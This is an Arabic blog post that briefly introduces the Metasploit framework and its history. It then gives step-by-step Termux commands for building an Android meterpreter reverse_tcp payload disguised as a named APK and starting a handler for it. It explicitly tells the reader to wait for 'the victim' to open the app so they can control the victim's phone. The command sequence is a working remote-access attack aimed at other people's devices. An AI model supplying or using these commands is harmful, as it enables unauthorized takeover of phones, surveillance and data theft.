المتاسبلوت (بالإنجليزية: Metasploit)
هو مشروع ضخم يستخدم من قبل المتخصصين بمجال الإختراق الأخلاقي و أمن المعلومات وهو ايضا عبارة عن مكتبة من الأدوات ، وقواعد بيانات لمجموعة من الثغرات التي يتم اكتشافها ، و يتم إضافة أدوات و ثغرات جديدة إليه حيث يمكن من خلالها البحث عن الثغرات الأمنية الموجودة في السيرفرات و الأجهزة وأهم إنجازات هذا المشروع هو منصة ميتاسبلوت المفتوحة المصدر وهي أداة تقوم بفتح منفذ في الجهاز المستهدف بهدف اختراق و لهذا يتم إستغلال هذه الأداة أيضاً للقيام بعمليات غير شرعية و هذا الشائع للأسف إذاً هذه الأداة تعتبر سلاح فعال فهناك من يعتقد أن الأشخاص الذين يتوجهون إليه يكون السبب الرئيسي التهكير واستغلاله لهذه الأغراض السيئة ، في الوقت الذي نجد مجموعة كبيرة لمن يصنفون في ال white hat يستغلون هذه البرنامج لحماية أنفسهم عبر معرفة أحدث الثغرات والأدوات الموجودة وسبل الحماية منها أنشأت ميتاسبلوت من قبل فريق HD Moore سنة 2003، كأداة شبكية محمولة مبرمجة بلغة Perl. سنة 2007 ثم أعيد برمجتها كليا بواسطة لغة Ruby. سنة 2009 . أعلن أنه وقع الإستحواذ عليها من قبل شركة Rapid7، وهي شركة أمنية تبحث عن نقاط الضعف في الأنظمة وتقدم حلول لها.
اوامر تثبيت الميتاسبلويت ؏ـلـى (Termux)
pkg install unstable-repo
pkg install metasploit
امر تشغيل الاداة
msfconsole
اوامر عمل البايلود وتشغيلة
انشاء بايلود بالأمر
msfvenom -p android/meterpreter/reverse_tcp LHOST= بتحط الاي بيLPORT= وهنا البورت المفتوح R> /sdcard/اسم تطبيق.apk
اوامر تشغيل البايلود
use exploit/multi/handler
show options
set payload android/meterpreter/reverse_tcp
show options
الاي بي=set LHOST
البورت=set LPORT
exploit
انتظر لحين فتح البايلود من الضحية وستفتح كلمه meterpreter وهنا تقدر تتحكم في هاتف الضحية جميع اوامر التحكم في الضحية اكتب help وهتظهر الاوامر
قم بتحمل جميع الاوامر الموجوده بالشرح وانسخها والصقها بالترتيب يجب عليك تحميل الملف لانه الاتستطيع النسخ ☺
تعليقات
إرسال تعليق